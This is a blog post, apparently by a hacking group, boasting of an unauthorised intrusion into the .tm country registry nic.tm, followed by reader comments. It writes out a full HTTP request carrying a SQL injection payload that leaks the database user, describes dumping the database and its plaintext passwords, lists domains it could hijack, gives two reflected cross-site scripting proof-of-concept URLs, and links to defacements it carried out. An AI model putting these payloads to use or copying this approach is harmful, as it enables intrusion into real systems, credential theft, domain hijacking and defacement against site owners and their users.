Data leakage from nic.tm

In an independent project we decided to penetrate some important sites and today we wanna share a small part of what we have done. Today we proudly announce about nic.tm here, it has a vulnerable application which is prone to a MySQL injection bug. It was a big lead for us to have all sites credentials. The rest of this update, we shall indicate about the vulnerability affected the site.
If you glance at picture below:


Nic.tm data leakage

It can be understood that the hidden parameters might not be checked, it was a hole we’ve focused on it:

POST /cgi-bin/mail_my_domains HTTP/1.1
Host: nic.tm
Content-Type: application/x-www-form-urlencoded
Content-Length: 142
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Connection: Close

Addr=1029999%27+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28system_user%28%29+as+char%29%29%29%2C0x27
%2C0x7e%29--+a&OrderBy=1

And we received:

..................
..................
..................
The database search found 0 ~'drs@localhost'~ domains
.................. .................. ..................

Oops, we saw the data leakage from Nic.tm’s database, drs@localhost is current user of database. In the term of data gathering, we made the attack automatically and dumped all the database. Another considerable note was the passwords, they have been saved in clear text and this is an unacceptable issue for a NIC of a country. All dumped data are accessible by this link. We also found some important domains among the dumped data (They have been listed below), we were capable of hijacking them easily:

www.youtube.tm
www.gmail.tm
www.msdn.tm
www.intel.tm
www.officexp.tm
www.xbox.tm
www.windowsvista.tm
www.orkut.tm
www.google.tm (?)
www.yahoo.tm
www.cisco.tm

This was not end of story, we realized that the application suffers from reflected Cross site scripting too. The infected parameters were Addr and OrderBy, POCs:

/cgi-bin/mail_my_domains?Addr=1%27+union+all+select+1%E2%80%9C+a&OrderBy=1847ae%27%3E%3Cscript%3Ealert%281%29%3C/script%3E
/cgi-bin/mail_my_domains?Addr=1%27+union+all+select+1--+ad4a26%3E%3Cscript%3Ealert%281%29%3C/script%3E&OrderBy=1

They both correctly work on Firefox. At last I would show you panel of Gmail.tm after authentication:

Gmail.tm hacked

We can also indicate to another security imperfection, in the panel, if you want to change the DNS of a domain, A confirmation e-mail is also sent to handler’s email which can be changed to attacker’s mail address. The following domains were defaced for POC:
http://zone-h.org/mirror/id/19125537
http://zone-h.org/mirror/id/19125766
http://append-hc.com/mirror/id/66204
http://zone-h.org/mirror/id/19126130
http://zone-h.org/mirror/id/19126154
http://zone-h.org/mirror/id/19125901
Have a nice hacking, be safe.

Leave a comment ?

16 Comments.

  1. dangeroushacker

    lol , i am sorry for nic.tm
    tnx for sharing .

  2. Awesome and simple hack! Thanks for sharing!!

  3. Yet,another NIC data leakage (NIC.LK) | Are you secure enough? - pingback on January 28, 2013 at 1:18 am
  4. یاشار دمت گرم

    یه سوال داشتم

    یه نفر هست همش داره سایت های جوملایی رو هک میکنه به اسم
    gh()st
    سایتشم اینه داداش:sec-w.com

    این ایمیلمه میشه بگی چیکار کنم از دست این عرب پدر…؟
    alavinik.nao@gmail.com

    • Yashar Shahinzadeh

      ایشون به احتمال بسیار زیاد روی یکی از کامپوننت های جوملا باگ داره
      شما اگر هک شدی لیست افزونه هات رو برای من بنویس

Leave a Comment


7 × two =

NOTE - You can use these HTML tags and attributes:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>